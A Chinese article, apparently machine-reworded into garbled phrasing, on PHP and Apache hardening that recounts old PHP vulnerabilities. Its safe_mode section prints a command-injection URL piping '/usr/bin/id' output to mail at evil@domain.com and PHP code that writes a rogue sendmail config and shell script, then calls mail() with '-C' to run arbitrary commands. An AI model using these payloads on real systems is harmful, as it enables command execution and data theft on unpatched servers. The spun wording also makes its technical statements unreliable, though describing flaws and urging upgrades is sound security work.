一、Web服务端安全性

PHP实际上*是Web服务端的一个控制模块作用，因此*要确保Web服务端的安全性。自然Web服务端要安全性又务必是先确保系统优化，那样就扯远了，数不胜数。PHP能够和各种各样Web服务端融合，这儿也只探讨Apache。十分提议以chroot方法安裝运行Apache，那样即便Apache和PHP以及脚本制作发生系统漏洞，受影响的也仅有这一束缚的系统软件，不容易伤害具体系统软件。可是应用chroot的Apache后，给运用也会产生一定的不便，例如联接mysql时务必用127.0.0.1详细地址应用tcp连接而不能用localhost完成socket联接，这在高效率上面略微差一点。也有mail涵数邮件发送也是个难题，由于php.ini里的：

[mail function]

; For Win32 only.

SMTP = localhost

; For Win32 only.

sendmail_from = me@localhost.com

全是对于Win32服务平台，因此*须在chroot自然环境下调节好sendmail。

二、PHP自身难题

1、远程控制外溢

PHP-4.1.2下列的全部版本号都存有上传文件远程控制跨站脚本攻击系统漏洞，并且进攻程序流程早已普遍广为流传，*十分高.

2、远程控制拒绝服务攻击

PHP-4.2.0和PHP-4.2.1存有PHP multipart/form-data POST要求解决远程控制系统漏洞，尽管不可以得到 当地用户权限，可是也可以导致拒绝服务攻击。

3、safe_mode绕开系统漏洞

也有PHP-4.2.2下列到PHP-4.0.5版本号都存有PHP mail涵数绕开safe_mode限定运行命令系统漏洞，4.0.5版本号逐渐mail涵数提升了第五个主要参数，因为设计师考虑不周全能够提升safe_mode的限定运行命令。在其中4.0.5版本号提升比较简单，只要用分号分隔后边加shell命令就可以了，例如存有PHP脚本制作evil.php：

实行以下的URL：

http://foo.com/evil.php?bar=;/usr/bin/id　mail evil@domain.com

这将id实行的結果发给evil@domain.com。

针对4.0.6至4.2.2的PHP提升safe_mode限定实际上是运用了sendmail的-C主要参数，因此系统软件务必是应用sendmail。以下的编码可以提升safe_mode限定运行命令：

#留意，下边这两个务必是不会有的，

或是他们的属主和本脚本制作的属主是一样

$script="/tmp/script123";

$cf="/tmp/cf123";

$fd = fopen($cf, "w");

fwrite($fd, "OQ/tmp

Sparse=0

R$*" . chr(9) . "$#local $@ $1 $: $1

Mlocal, P=/bin/sh, A=sh $script");

fclose($fd);

$fd = fopen($script, "w");

fwrite($fd, "rm -f $script $cf; ");

fwrite($fd, $cmd);

fclose($fd);

mail("nobody", "", "", "", "-C$cf");

?>

或是应用之上有什么问题版本号PHP的客户一定要立即升級到*新版，那样才可以清除基本上的安全隐患。